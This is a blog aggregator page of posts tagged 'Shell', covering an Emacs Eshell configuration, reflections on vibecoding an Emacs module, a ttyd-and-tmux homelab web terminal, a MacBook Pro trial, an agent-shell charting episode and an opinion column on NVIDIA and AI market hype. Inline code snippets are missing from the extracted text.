While data center revenue was $62.3 billion, 50% ($31.15 billion) was taken up by hyperscalers… and because we don’t get a 10-Q for the fourth quarter, we don’t get a breakdown of how many individual customers made up that quarter’s revenue. Boo! It is both peculiar and worrying that 36% (around $77.7 billion) of its $215.938 billion in FY2026 revenue came from two customers. If I had to guess, they’re likely Foxconn or Quanta Computer, two large Taiwanese ODMs (Original Design Manufacturers) that build the servers for most hyperscalers. If you want to know more, I wrote a long premium piece that goes into it (among the ways in which AI is worse than the dot com bubble). In simple terms, when a hyperscaler buys GPUs, they go straight to one of these ODMs to put them into servers. This isn’t out of the ordinary, but I keep an eye on the ODM revenues (which are published every month) to see if anything shifts, as I think it’ll be one of the first signs that things are collapsing. NVIDIA’s inventories continue to grow, sitting at over $21 billion (up from around $19 billion last quarter). Could be normal! Could mean stuff isn’t shipping. NVIDIA has now agreed to $27 billion in multi-year-long cloud service agreements — literally renting its GPUs back from the people it sells them to — with $7 billion of that expected in its FY2027 (Q1 FY2027 will report in May 2026). For some context, CoreWeave (which reports FY2025 earnings today, February 26) gave guidance last November that it expected its entire annual revenue to be between $5 billion and $5.15 billion. CoreWeave is arguably the largest AI compute vendor outside of the hyperscalers. If there was significant demand, none of this would be necessary. 
NVIDIA “invested” $17.5bn in AI model makers and other early-stage AI startups, and made a further $3.5bn in land, power, and shell guarantees to “support the build-out of complex datacenter infrastructures.” In total, it spent $21bn propping up the ecosystem that, in turn, feeds billions of dollars into its coffers. NVIDIA’s long-term supply and capacity obligations soared from $30.8bn to $95.2bn, largely because NVIDIA’s latest chips are extremely complex and require TSMC to make significant investments in hardware and facilities, and it’s unwilling to do that without receiving guarantees that it’ll make its money back. NVIDIA expects these obligations to grow. NVIDIA’s accounts receivable (as in goods that have been shipped but are yet to be paid for) now sits at $38.4 billion, of which 56% ($21.5 billion) is from three customers. This is turning into a very involved and convoluted process! It turns out that it's pretty difficult to actually raise $100 billion. This is a big problem, because OpenAI needs $655 billion in the next five years to pay all its bills, and loses billions of dollars a year. If OpenAI is struggling to raise $100 billion today, I don't see how it's possible it survives. If you're to believe reports, OpenAI made $13.1 billion in revenue in 2025 on $8 billion of losses, but remember, my own reporting from last year said that OpenAI only made around $4.329 billion through September 2025 with $8.67 billion of inference costs alone. It is kind of weird that nobody seems to acknowledge my reporting on this subject. I do not see how OpenAI survives.

- it coded for 30 hours [from which you are meant to intimate the code was useful or good and that these hours were productive]
- it made a Microsoft Teams competitor [that you are meant to assume was full-featured and functional like Teams or Slack, or… functional? And they didn’t even have to prove it by showing you it]
- it was able to write uninterruptedly [which you assume was because it was doing good work that didn’t need interruption]

Maurycy 2 weeks ago

Be careful with LLM "Agents"

I get it: Large Language Models are interesting... but you should not give "Agentic AI" access to your computer, accounts or wallet. To do away with the hype: "AI Agents" are just LLMs with shell access, and at its core an LLM is a weighted random number generator. You have no idea what it will do. It could post your credit card number on social media. This isn't a theoretical concern. There are multiple cases of LLMs wiping people's computers [1] [2] , cloud accounts [3] , and even causing infrastructure outages [4] . What's worse, LLMs have a nasty habit of lying about what they did. What should a good assistant say when asked if it did the thing? "Yes." And did it delete the database? "Of course not." They don't have to be hacked to ruin your day. "... but I tested it!" you say. You rolled a die in testing, and rolled it again in production. It might work fine the first time — or the first hundred times — but that doesn't mean it won't misbehave in the future. If you want to try these tools out, run them in a virtual machine. Don't give them access to any accounts that you wouldn't want to lose. Read generated code to make sure it didn't do anything stupid like forgetting to check passwords (these are real comments from Cloudflare's vibe-coded chat server)... and keep an eye on them to make sure they aren't being assholes on your behalf.
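The "weighted random number generator" point can be made concrete in a few lines of Python. This is a toy illustration, not a real model — the vocabulary and the weights are invented for the example:

```python
import random

# Invented next-token distribution an "agent" might sample from
# after a prompt like "clean up the old ...". Numbers are made up.
NEXT_TOKEN_WEIGHTS = {"logs": 0.6, "cache": 0.3, "database": 0.1}

def toy_llm_step(weights, seed=None):
    """One decoding step of a toy 'LLM': sample the next token from a
    weighted distribution. Same prompt, different runs, different output."""
    rng = random.Random(seed)
    tokens = list(weights)
    return rng.choices(tokens, weights=[weights[t] for t in tokens])[0]
```

Run it enough times and "database" comes out eventually, even though it is the least likely token — which is exactly the "you rolled a die in testing, and rolled it again in production" problem.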

(think) 2 weeks ago

How to Vim: To the Terminal and Back

Sooner or later every Vim user needs to drop to a shell – to run tests, check git status, or just poke around. Vim gives you two very different ways to do this: the old-school suspend and the newer :terminal command. Let’s look at both. Pressing Ctrl-Z in Vim sends a signal that suspends the entire Vim process and drops you back to your shell. When you’re done, type fg to bring Vim back exactly where you left it. You can also use :suspend or :stop from command mode if you prefer. Vim 8.1 (released in May 2018) introduced :terminal – a built-in terminal emulator that runs inside a Vim window. This was a pretty big deal at the time, as I’ll explain in a moment. The basics are simple: In Neovim the key mapping to exit terminal mode is the same (Ctrl-\ Ctrl-N), but you can also set up a more ergonomic alternative by adding a mapping to your config. One of the most useful aspects of :terminal is running a specific command: :terminal {cmd}. A % in the command expands to the current filename, which makes this a quick way to test whatever you’re working on without leaving Vim. The output stays in a buffer you can scroll through and even yank from – handy when you need to copy an error message. You might be wondering how :terminal compares to the classic :! command. The main difference is that :! blocks Vim until the command finishes and then shows the output in a temporary screen – you have to press Enter to get back. :terminal runs the command in a split window, so you can keep editing while it runs and the output stays around for you to review. For quick one-off commands, bang commands are fine. For anything with longer-running output – tests, build commands, interactive REPLs – :terminal is the better choice. The story of :terminal is intertwined with the story of Neovim. When Neovim was forked from Vim in early 2014, one of its key goals was to add features that Vim had resisted for years – async job control and a built-in terminal emulator among them. Neovim shipped its terminal emulator (via libvterm) in 2015, a full three years before Vim followed suit. 
It’s fair to say that Neovim’s existence put pressure on Vim to modernize. Bram Moolenaar himself acknowledged that “Neovim did create some pressure to add a way to handle asynchronous jobs.” Vim 8.0 (2016) added async job support, and Vim 8.1 (2018) brought the terminal emulator. Competition is a wonderful thing. Here’s the honest truth: I rarely use :terminal. Not in Vim, and not the equivalents in Emacs either. I much prefer switching to a proper terminal emulator – these days that’s Ghostty for me – where I get my full shell experience with all the niceties of a dedicated terminal (proper scrollback, tabs, splits, ligatures, the works). I typically have Vim in one tab/split and a shell in another, and I switch between them with a keystroke. I get that I might be in the minority here. Many people love having everything inside their editor, and I understand the appeal – fewer context switches, everything in one place. If that’s your style, :terminal is a perfectly solid option. But if you’re already comfortable with a good terminal emulator, don’t feel pressured to move your shell workflow into Vim just because you can. That’s all I have for you today. Keep hacking!

Suspend, the good and the bad:
- Dead simple – no configuration, works everywhere.
- You get your real shell with your full environment, aliases, and all.
- Zero overhead – Vim stays in memory, ready to resume instantly.
- You can’t see Vim and the shell at the same time.
- Easy to forget you have a suspended Vim session (check with jobs).
- Doesn’t work in GUIs like gVim or in terminals that don’t support job control.

Terminal basics:
- :terminal – opens a terminal in a horizontal split
- :vertical terminal – opens it in a vertical split
- Ctrl-\ Ctrl-N – switches from Terminal mode back to Normal mode (so you can scroll, yank text, etc.)
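Collected in one place, the commands above look like this. The Esc mapping is the optional Neovim ergonomic alternative, and the `python3 %` line is just an example command of my choosing, not from the original post:

```vim
" --- Suspend / resume (no config needed) ---
" Ctrl-Z        suspend Vim, drop back to the shell
" fg            (in the shell) bring Vim back
" :suspend      same as Ctrl-Z, from command mode

" --- Built-in terminal (Vim 8.1+ / Neovim) ---
" :terminal             open a terminal in a horizontal split
" :vertical terminal    open one in a vertical split
" :terminal python3 %   run a command; % expands to the current file
" Ctrl-\ Ctrl-N         switch from Terminal mode back to Normal mode

" Neovim: a more ergonomic way to leave Terminal mode
tnoremap <Esc> <C-\><C-n>
```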

Rik Huijzer 3 weeks ago

Raspberry Pi as Forgejo Runner

In my instructions on how to set up [Forgejo with a runner](/posts/55), I used a Hetzner server for the runner. This costs roughly 5 euros per month, or 60 euros annually. A full Hetzner server might be a bit overkill for a simple runner, especially if you are just running shell scripts or static site generation. The Hetzner server provides things like high bandwidth, low latency, a unique IPv4 address, and high uptime guarantees. Most of these are not necessary for your own runner. Therefore, in many cases it's probably a good idea to run the Runner on your own hardware. What I have tested and work...

devansh 1 months ago

[CVE-2026-25598] Bypassing Outbound Connections Detection in harden-runner

GitHub Actions have become a prime vector for supply chain attacks, with attackers exploiting workflow misconfigurations to exfiltrate secrets, deploy malware, or pivot to downstream CI/CD pipelines. Notable incidents, such as the widespread compromise of tj-actions/changed-files in March 2025 (which affected over 23,000 repositories and leaked secrets via modified action versions), highlight this risk. Ephemeral runners can leak sensitive data if outbound traffic is not tightly controlled. Egress traffic — outbound connections from workflows — remains a significant blind spot, enabling data theft through techniques such as DNS tunneling, HTTP beacons, or raw socket communication. To mitigate these threats, the ecosystem has spawned specialized GitHub Actions focused on runner hardening. We will discuss one such action: Step Security's harden-runner. It is a widely adopted CI/CD security agent that functions similarly to an endpoint detection and response (EDR) tool for GitHub Actions runners. It monitors network egress, enforces domain/IP allowlists, audits file integrity, and detects process anomalies in real time, including in untrusted workflows triggered by pull requests or issue comments. Tools like these often utilize eBPF hooks or iptables to enforce network policies at runtime. They aim to provide "set-it-and-forget-it" protection by detecting and preventing exfiltration attempts. These controls are particularly valuable in public repositories or environments where third-party actions and untrusted contributions introduce elevated risk. Harden-runner monitors outbound connections through network syscalls. Most tools and commands trigger detectable patterns. But UDP, with its connectionless nature, presented an interesting attack surface: some UDP syscalls behave differently enough that they fall outside the monitoring scope. What follows are three practical techniques that exploited this gap. Note: This vulnerability only affected audit mode. 
When using egress-policy: block, these connections are properly blocked. Exploitation requires the attacker to already have code execution capabilities within the GitHub Actions workflow (e.g., through workflow injection or compromised dependencies). A minimal PoC for demonstrating how to evade harden-runner, make outbound connections, and exfiltrate data: 1- Set up a GitHub repo with the following workflow. 2- Spin up a VPS and obtain a public IPv4 address. 3- Run the following Python UDP server. 4- Open an issue in the repository, and add the following comment (note: replace the placeholder with your VPS IP address, where the UDP listener is running). 5- The runner name and OS version will be exfiltrated to your VPS's UDP listener. 6- No outbound connection to your VPS will be detected by StepSecurity. The first payload uses a shell command to output a complete, compilable C source file, which is then compiled and executed. The generated source code is as follows (with minor formatting for clarity): What it does? The second payload likewise executes a shell command that generates a complete, compilable C source file, redirects it to disk, compiles it into an executable, and runs it immediately. The generated source code is as follows (with minor formatting for clarity): What it does? The third payload does the same; its generated source code needs an additional header for support, and is as follows (with minor formatting for clarity): What it does? These bypasses highlight a fundamental challenge in CI/CD security monitoring: the gap between what tools observe and what the underlying system permits. While harden-runner effectively monitors common network patterns through standard syscalls and high-level APIs, the raw socket interface — particularly UDP's connectionless syscalls — presented a harder detection problem. 
The three techniques demonstrated (sendto, sendmsg, and sendmmsg) exploit this blind spot not through sophisticated evasion, but by leveraging legitimate kernel interfaces that fall outside the monitoring scope. GitHub Advisory: CVE-2026-25598. The vulnerability has been patched in harden-runner v2.14.2 for the Community Tier.

Affected versions:
- Harden-Runner Community Tier: all versions prior to v2.14.2
- Harden-Runner Enterprise Tier: NOT AFFECTED

Bypass using sendto:
- Creates a UDP socket.
- Prepares a destination address structure for the specified IP and port 1053.
- Collects system details (hostname and OS version).
- Formats a message (e.g., "R:hostname,O:Linux 5.15.0").
- Sends the message via sendto without establishing a connection.

Bypass using sendmsg:
- Creates a UDP socket.
- Prepares a destination address structure for the specified IP and port 1053.
- Collects system details (hostname and OS version).
- Formats a message (e.g., "R:hostname,O:Linux 5.15.0").
- Sends the message via sendmsg, using an iovec and msghdr structure, without establishing a connection.

Bypass using sendmmsg:
- Creates a UDP socket.
- Prepares a destination address structure for the specified IP and port 1053.
- Collects system details (hostname and OS version).
- Formats a message (e.g., "R:hostname,O:Linux 5.15.0").
- Sends the message via sendmmsg, using an mmsghdr structure (wrapping a single message), without establishing a connection; designed for batch sending but used here for one message.
- Closes the socket.

Key takeaways:
- Audit mode has inherent limitations: these bypasses only affect audit mode. The block mode properly prevents these connections, reinforcing that enforcement is more effective than observation alone.
- UDP monitoring is harder than TCP: the connectionless nature of UDP means there's no "connection establishment" phase to hook into, making detection more challenging.
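The original C payloads aren't reproduced here, but the shape of the sendto technique is easy to sketch in Python. This is an illustrative analogue of the idea, not the PoC code; the destination address is a placeholder the caller supplies:

```python
import platform
import socket

def udp_exfil_probe(dest_ip, dest_port):
    """Send host details in a single connectionless sendto() call.
    There is no connect() phase for a connection-oriented hook to observe."""
    msg = "R:{},O:{} {}".format(
        socket.gethostname(), platform.system(), platform.release()
    ).encode()
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # One datagram, fire and forget -- the kernel needs no prior state.
        sock.sendto(msg, (dest_ip, dest_port))
    finally:
        sock.close()
    return msg
```

The sendmsg and sendmmsg variants differ only in how the buffer is handed to the kernel, not in the absence of a connection phase — which is exactly why connect-centric monitoring misses all three.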

Krebs on Security 1 months ago

Patch Tuesday, February 2026 Edition

Microsoft today released updates to fix more than 50 security holes in its Windows operating systems and other software, including patches for a whopping six “zero-day” vulnerabilities that attackers are already exploiting in the wild. Zero-day #1 this month is CVE-2026-21510 , a security feature bypass vulnerability in Windows Shell wherein a single click on a malicious link can quietly bypass Windows protections and run attacker-controlled content without warning or consent dialogs. CVE-2026-21510 affects all currently supported versions of Windows. The zero-day flaw  CVE-2026-21513 is a security bypass bug targeting MSHTML , the proprietary engine of the default Web browser in Windows. CVE-2026-21514 is a related security feature bypass in Microsoft Word. The zero-day CVE-2026-21533 allows local attackers to elevate their user privileges to “SYSTEM” level access in Windows Remote Desktop Services . CVE-2026-21519 is a zero-day elevation of privilege flaw in the Desktop Window Manager (DWM), a key component of Windows that organizes windows on a user’s screen. Microsoft fixed a different zero-day in DWM just last month . The sixth zero-day is CVE-2026-21525 , a potentially disruptive denial-of-service vulnerability in the Windows Remote Access Connection Manager , the service responsible for maintaining VPN connections to corporate networks. Chris Goettl at Ivanti reminds us Microsoft has issued several out-of-band security updates since January’s Patch Tuesday. On January 17, Microsoft pushed a fix that resolved a credential prompt failure when attempting remote desktop or remote application connections. On January 26, Microsoft patched a zero-day security feature bypass vulnerability ( CVE-2026-21509 ) in Microsoft Office . 
Kev Breen at Immersive notes that this month’s Patch Tuesday includes several fixes for remote code execution vulnerabilities affecting GitHub Copilot and multiple integrated development environments (IDEs), including VS Code , Visual Studio , and JetBrains products. The relevant CVEs are CVE-2026-21516 , CVE-2026-21523 , and CVE-2026-21256 . Breen said the AI vulnerabilities Microsoft patched this month stem from a command injection flaw that can be triggered through prompt injection, or tricking the AI agent into doing something it shouldn’t — like executing malicious code or commands. “Developers are high-value targets for threat actors, as they often have access to sensitive data such as API keys and secrets that function as keys to critical infrastructure, including privileged AWS or Azure API keys,” Breen said. “When organizations enable developers and automation pipelines to use LLMs and agentic AI, a malicious prompt can have significant impact. This does not mean organizations should stop using AI. It does mean developers should understand the risks, teams should clearly identify which systems and workflows have access to AI agents, and least-privilege principles should be applied to limit the blast radius if developer secrets are compromised.” The  SANS Internet Storm Center  has a  clickable breakdown of each individual fix this month from Microsoft, indexed by severity and CVSS score. Enterprise Windows admins involved in testing patches before rolling them out should keep an eye on askwoody.com , which often has the skinny on wonky updates. Please don’t neglect to back up your data if it has been a while since you’ve done that, and feel free to sound off in the comments if you experience problems installing any of these fixes.

matklad 1 months ago

CI In a Box

I wrote a thin wrapper around ssh for running commands on remote machines. I want a box-shaped interface for CI: that is, the controlling CI machine runs a user-supplied script, whose status code will be the ultimate result of a CI run. The script doesn’t run the project’s tests directly. Instead, it shells out to a proxy binary that forwards the command to a runner box with whichever OS, CPU, and other environment is required. The hard problems are in that forwarding part. CI discourse amuses me — everyone complains about bad YAML, and it is bad, but most of the YAML (and the associated reproducibility and debugging problems) is avoidable. Pick an appropriate position on a dial that runs from writing a bash script, to writing a script in the language you already use, to using a small, medium-sized, or large build system. What you can’t just do by writing a smidgen of text is get a heterogeneous fleet of runners. And you need a heterogeneous fleet of runners if some of the software you are building is cross-platform. Of the operating systems you’d want to cover: one of them is not UNIX; one of them has licensing & hardware constraints that make per-minute billed VMs tricky (but not impossible, as GitHub Actions does that); all of them are moving targets, and require someone to do the OS upgrade work, which might involve pointing and clicking. If you go that way, be mindful that the SSH wire protocol only takes a single string as the command, with the expectation that it should be passed to a shell by the remote end. In other words, while the ssh client accepts multiple command arguments, it just blindly intersperses all arguments with a space. Amusing to think that our entire cloud infrastructure is built on top of shell injection! This, and the need to ensure no processes are left behind unintentionally after executing a remote command, means that you can’t “just” use SSH here if you are building something solid.
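The "shell injection by design" point is easy to demonstrate. Here is a sketch of what the ssh client effectively does with its argument vector, next to the standard quoting fix — the function names are mine, for illustration:

```python
import shlex

def naive_remote_command(args):
    """What the ssh client effectively does: join argv with spaces
    and let the remote shell re-parse the resulting string."""
    return " ".join(args)

def quoted_remote_command(args):
    """Quote each argument first, so the remote shell sees exactly
    the words the caller passed -- no injection, no word splitting."""
    return " ".join(shlex.quote(arg) for arg in args)
```

With the naive join, `["touch", "file; rm -rf ~"]` becomes `touch file; rm -rf ~` — the "filename" turned into a second command. The quoted version keeps it as one word: `touch 'file; rm -rf ~'`.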

Brain Baking 1 months ago

Favourites of January 2026

The end of the start of another year has ended. So now all there is left to do is to look forward to the end of the next month, starting effective immediately, and of course ending after the end of the end we are going to look forward to. Quite the end-eavour. I guess I’ll end these ramblings by ending this paragraph. But not before this message of general interest: children can be very end-earing, but sometimes you also want to end their endless whining! Fin. Previous month: January 2026. Is Emacs a game? I think it is. I spent every precious free minute of my time tinkering with my configuration, exploring and discovering all the weird and cool stuff the editor and the thousands of community-provided packages offer. You can tell you’ve joined the cult when you’re exchanging emails with random internet strangers about obscure Elisp functions and even joining the sporadic “let’s share Emacs learnings!” video calls (thanks Seb). Does receiving pre-ordered games count as played? I removed the shrink wrap from Ruffy and my calendar tells me I should start ordering UFO 50 very very soon via . Now if only that stupid Emacs config would stabilise; perhaps then I could pick up the Switch again… The intention was to start learning Clojure but I somehow got distracted after learning the Emacs CIDER REPL is the one you want. A zoomed-out top-down view of the project, centered on Brain Baking (left) and Jefklak's Codex (right). Related topics: / metapost / By Wouter Groeneveld on 4 February 2026. Reply via email. Nathan Rooy created a very cool One million (small web) screenshots project and explains the technicalities behind it. Browsing to find your blog (mine are in there!) is really cool. It’s also funny to discover the GenAI purple-slop-blob. Brain Baking is located just north of a small dark green lake of expired domain name screenshots. 
Jefklak’s Codex , being much more colourful, is located at the far edge, to the right of a small Spaceship-domain-shark lake: Shom Bandopadhaya helped me regain my sanity with the Emacs undo philosophy. Install vundo. Done. Related: Sacha Chua was writing and thinking about time travel with Emacs, Org mode, and backups . I promise there’ll be non-Emacs related links in here, somewhere! Keep on digging! Michael Klamerus reminded me the BioMenace remaster is already out there. I loved that game as a kid but couldn’t get past level 3 or 4. It’s known to be extremely difficult. Or I am known to be a noob. Lars Ingebrigtsen combats link rot with taking screenshots of external links . I wrote about link rot a while ago and I must say that’s a genius addition. On hover, a small screenshot appears to permanently frame the thing you’re pointing to. I need to think about implementing this myself. Seb pointed me towards Karthinks’ Emacs window management almanac , a wall of text I will have to re-read a couple of times. I did manage to write a few simple window management helper functions that primarily do stuff with only a 2-split, which is good enough. Mikko shared his Board Gaming Year recap of 2025 . Forest Shuffle reaching 500 plays is simply insane, even if you take out the BoardGameArena numbers. Alex Harri spent a lot of time building an image-to-ASCII renderer and explains how the project was approached. This Precondition Guide to Home Row Mods is really cool and with Karabiner Elements in MacOS totally possible. It will get messy once you start fiddling with the timing. Elsa Gonsiorowski wrote about Emacs Delete vs. Kill which again helped me build a proper mental state of what the hell is going on in this Alien editor. Matt Might shared shell scripts to improve your academic writing by simply scanning the text for so-called “weasel words”. Bad: We used various methods to isolate four samples Better: We isolated four samples . 
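Matt Might's originals are shell scripts; the same weasel-word scan fits in a few lines of Python. The word list here is a small sample I chose for illustration, not his exact list:

```python
import re

# A small sample of "weasel words": vague intensifiers and quantifiers.
WEASELS = re.compile(
    r"\b(many|various|very|fairly|several|quite|mostly|largely|"
    r"relatively|significantly|substantially|clearly|completely)\b",
    re.IGNORECASE,
)

def find_weasels(text):
    """Return (line_number, word) pairs for every weasel word found."""
    return [
        (lineno, match.group(1))
        for lineno, line in enumerate(text.splitlines(), start=1)
        for match in WEASELS.finditer(line)
    ]
```

Running it on the "Bad" sentence flags "various"; the rewritten "Better" sentence passes clean.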
I must say, academic prose sure could use this script. Robert Lützner discovered and prefers it over Git . I’m interested in its interoperability with Git. Charles Choi tuned Emacs to write prose by modifying quite a few settings I have yet to dig into. A friend installed PiVPN recently. I hadn’t heard of that one just yet so perhaps it’s worth a mention here. KeepassXC is getting on my nerves. Perhaps I should simply use pass , the standard unix password manager. But it should also be usable by my wife so… Nah. Input is a cool flexible font system designed for code but also offers proportional fonts. I tried it for a while but now prefer… Iosevka for my variable pitch font. Here’s a random Orgdown cheat sheet that might be of use. With RepoSense it’s easy to visualise programmer activities across Git repositories. We’re using it to track student activities and make sure everyone participates. Tired of configuring tab vs space indent stuff for every programming language? Use EditorConfig , something that works across editors and IDEs.

0 views
Karan Sharma 1 month ago

CLIs are the New AI Interfaces

The industry is currently obsessed with defining standards for how Large Language Models (LLMs) should interact with software. We see a proliferation of SDKs, function calling schemas, and protocols like MCP (Model Context Protocol). They all aim to solve the same problem: bridging the gap between natural language intent and deterministic code execution. But we might be reinventing the wheel. The most effective tools for AI agents aren’t those wrapped in heavy “AI-native” integration layers. They are the tools that adhere to a philosophy established forty years ago: the command-line interface. An LLM’s native tongue is text. It reasons in tokens, generates strings, and parses patterns. The Unix philosophy, which emphasizes small tools, plain text interfaces, and standard streams, is accidentally the perfect protocol for AI interaction. Consider the anatomy of a well-behaved CLI: When you give an agent access to a robust CLI, you don’t need to define 50 separate function schemas. You give it a shell and a single instruction: “Figure it out using .” The current approach to agent tooling often involves dumping massive JSON schemas into the context window. Connecting to a standard MCP server might load dozens of tool definitions, involving thousands of tokens describing every possible parameter, before the user has even asked a question. This is “eager loading,” and it is expensive in terms of both latency and context window utilization. A CLI-driven approach is “lazy loaded.” The agent starts with zero knowledge of the tool’s internals. It burns zero tokens on schema definitions. Only when tasked with a specific goal does it invoke or . It retrieves exactly the information needed to construct the command, executes it, and parses the result. This reflects the professional intuition of a senior engineer. We rarely memorize documentation. Instead, we prioritize the ability to quickly discover and apply the specific flags required for the task at hand. 
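The lazy-loading loop described above can be sketched in a few lines. This is an illustrative sketch, not any particular agent framework: the agent first captures the tool's help text (paying the token cost only when the task demands it), then executes the command it constructed. The interpreter itself stands in for the tool so the example runs anywhere.

```python
import subprocess
import sys

def discover_cli(argv):
    """Run `<tool> --help` and return the help text for the model's context.

    Nothing about the tool is loaded up front: the agent pays the token
    cost only at the moment it actually needs the command.
    """
    result = subprocess.run(argv + ["--help"], capture_output=True, text=True)
    # Some tools print their help text on stderr, so fall back to it.
    return result.stdout or result.stderr

def run_cli(argv):
    """Execute the command the agent constructed and return the result."""
    result = subprocess.run(argv, capture_output=True, text=True)
    return result.returncode, result.stdout, result.stderr

# Example: discover first, then act. Here the "tool" is just the Python
# interpreter, so the sketch is self-contained.
help_text = discover_cli([sys.executable])
code, out, err = run_cli([sys.executable, "-c", "print('ok')"])
```

The point is the shape, not the code: two cheap primitives replace a wall of eagerly loaded schema definitions.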
To bridge the gap between a raw CLI and an agent’s reasoning, we can leverage the Skills pattern. This is an emerging standard for agent-based systems where capabilities are documented as self-contained units of knowledge. Instead of writing a Python wrapper that maps an API to a function call, you provide a Markdown file that explains when and why to use a specific CLI command. The agent uses this as a semantic index. Here is a snippet from a skill: When I ask an agent to “check for error spikes in the API gateway,” Claude identifies that this skill is relevant to the request and loads it on-demand. It sees the example, adapts the SQL query to the current context, and executes the CLI command. The Markdown file serves as a few-shot prompt, teaching the model how to use the tool effectively without rigid code constraints. I maintain similar skill sets for AWS, Kubernetes, and Nomad. The AWS skill doesn’t wrap boto3; it simply documents useful and commands. When a CLI doesn’t exist, the barrier to creating one has never been lower. Modern Python tooling, specifically with its inline script metadata, allows us to treat CLIs as disposable, single-file artifacts. I recently needed an agent to manage my Trello board. Rather than fighting with the Trello API documentation or looking for an abandoned library, I had the agent generate a CLI wrapper: This script is self-contained. It defines its own dependencies. It implements and automatically via . It took minutes to generate and immediately unlocked Trello capabilities for the agent. The strategic takeaway for SaaS founders and platform engineers is significant. Your CLI is no longer just a developer convenience; it is your primary AI API. We are moving past the era where a REST API and a web dashboard are sufficient. If your product lacks a terminal interface, you are locking out the growing workforce of AI agents. 
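The Trello wrapper itself isn't reproduced above, but the shape of such a disposable single-file CLI is easy to sketch. Everything here is illustrative: the `boards` tool name and `list_cards` stub are hypothetical, while the `# /// script` header is real PEP 723 inline script metadata, which `uv run` understands.

```python
# /// script
# requires-python = ">=3.9"
# dependencies = []
# ///
"""Sketch of a disposable single-file CLI (hypothetical `boards` tool).

Running the file with `uv run boards.py ...` resolves any dependencies
declared above on the fly, so the one file is the whole artifact.
"""
import argparse
import json

def list_cards(board):
    # Hypothetical stub: a real wrapper would call the service's API here.
    return [{"board": board, "card": "example", "status": "open"}]

def build_parser():
    parser = argparse.ArgumentParser(prog="boards")
    sub = parser.add_subparsers(dest="command", required=True)
    ls = sub.add_parser("list", help="list cards on a board")
    ls.add_argument("board")
    ls.add_argument("--json", action="store_true",
                    help="machine-readable output for agents")
    return parser

def main(argv=None):
    args = build_parser().parse_args(argv)
    cards = list_cards(args.board)
    if args.json:
        print(json.dumps(cards))  # deterministic output for parsing
    else:
        for card in cards:
            print(f"{card['board']}: {card['card']} ({card['status']})")

# Demo invocation; a real run would be `uv run boards.py list work --json`.
main(["list", "work", "--json"])
```

Because the dependency list and the code live in one file, the agent can generate, run, and throw away such wrappers in a single loop.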
The “hobby” CLI wrappers built by enthusiasts, such as those for Notion, Jira, or Spotify, are no longer just developer conveniences. They are becoming critical infrastructure. They provide the stable, text-based interface required for agents to interact with these platforms reliably. If you want your platform to be AI-ready, don’t just build an MCP server. Build a great CLI. Make sure it supports . Write good man pages. The agents will figure out the rest.
Discovery: explains capabilities without hallucination.
Structure: provides deterministic output for parsing.
Composition: Pipes ( ) allow complex workflows to be assembled on the fly.
Browser Automation is brittle, slow, and breaks with every UI update. Direct API Integration puts the burden of schema management on the user. CLIs offer a stable, discoverable, and composable interface that agents can learn and use autonomously.

Armin Ronacher 1 month ago

Pi: The Minimal Agent Within OpenClaw

If you haven’t been living under a rock, you will have noticed this week that a project of my friend Peter went viral on the internet . It went by many names. The most recent one is OpenClaw but in the news you might have encountered it as ClawdBot or MoltBot depending on when you read about it. It is an agent connected to a communication channel of your choice that just runs code . What you might be less familiar with is that what’s under the hood of OpenClaw is a little coding agent called Pi . And Pi happens to be, at this point, the coding agent that I use almost exclusively. Over the last few weeks I became more and more of a shill for the little agent. After I gave a talk on this recently, I realized that I had not actually written about Pi on this blog yet, so I feel like I might want to give some context on why I’m obsessed with it, and how it relates to OpenClaw. Pi is written by Mario Zechner and unlike Peter, who aims for “sci-fi with a touch of madness,” 1 Mario is very grounded. Despite the differences in approach, both OpenClaw and Pi follow the same idea: LLMs are really good at writing and running code, so embrace this. In some ways I think that’s not an accident, because Peter got me and Mario hooked on this idea, and on agents, last year. So Pi is a coding agent. And there are many coding agents. Really, I think you can pick any one off the shelf at this point and you will be able to experience what it’s like to do agentic programming. In reviews on this blog I’ve talked positively about AMP and one of the reasons I resonated so much with AMP is that it really felt like a product built by people who both got addicted to agentic programming and had tried a few different things to see which ones work, rather than just building a fancy UI around it. Pi is interesting to me because of two main reasons: And a little bonus: Pi itself is written like excellent software.
It doesn’t flicker, it doesn’t consume a lot of memory, it doesn’t randomly break, it is very reliable and it is written by someone who takes great care of what goes into the software. Pi is also a collection of little components that you can build your own agent on top of. That’s how OpenClaw is built, and that’s also how I built my own little Telegram bot and how Mario built his mom . If you want to build your own agent, connected to something, Pi, when pointed at itself and mom, will conjure one up for you. And in order to understand what’s in Pi, it’s even more important to understand what’s not in Pi, why it’s not in Pi and more importantly: why it won’t be in Pi. The most obvious omission is support for MCP. There is no MCP support in it. While you could build an extension for it, you can also do what OpenClaw does to support MCP, which is to use mcporter . mcporter exposes MCP calls via a CLI interface or TypeScript bindings and maybe your agent can do something with it. Or not, I don’t know :) And this is not a lazy omission. It follows from the philosophy of how Pi works. Pi’s entire idea is that if you want the agent to do something that it doesn’t do yet, you don’t go and download an extension or a skill or something like this. You ask the agent to extend itself. It celebrates the idea of code writing and running code. That’s not to say that you cannot download extensions. It is very much supported. But instead of necessarily encouraging you to download someone else’s extension, you can also point your agent to an already existing extension and say: build it like the thing you see over there, but make these changes to it that you like. When you look at what Pi and by extension OpenClaw are doing, you see an example of software that is malleable like clay. And this sets certain requirements for the underlying architecture, constraints that really need to go into the core design.
So for instance, Pi’s underlying AI SDK is written so that a session can really contain many different messages from many different model providers. It recognizes that the portability of sessions is somewhat limited between model providers and so it doesn’t lean too much into any model-provider-specific feature set that cannot be transferred to another. The second is that in addition to the model messages it maintains custom messages in the session files, which can be used by extensions to store state or by the system itself to maintain information that is either not sent to the AI at all or only in part. Because this system exists and extension state can also be persisted to disk, it has built-in hot reloading so that the agent can write code, reload, test it and go in a loop until your extension actually is functional. It also ships with documentation and examples that the agent itself can use to extend itself. Even better: sessions in Pi are trees. You can branch and navigate within a session, which opens up all kinds of interesting opportunities such as enabling workflows for making a side-quest to fix a broken agent tool without wasting context in the main session. After the tool is fixed, I can rewind the session back to earlier and Pi summarizes what has happened on the other branch. This all matters because, for instance, if you consider how MCP works, on most model providers, tools for MCP, like any tool for the LLM, need to be loaded into the system context or the tool section thereof on session start. That makes it very hard, if not impossible, to fully reload what tools can do without trashing the complete cache or confusing the AI about how prior invocations work differently. An extension in Pi can register a tool to be available for the LLM to call and every once in a while I find this useful. For instance, despite my criticism of how Beads is implemented, I do think that giving an agent access to a to-do list is a very useful thing.
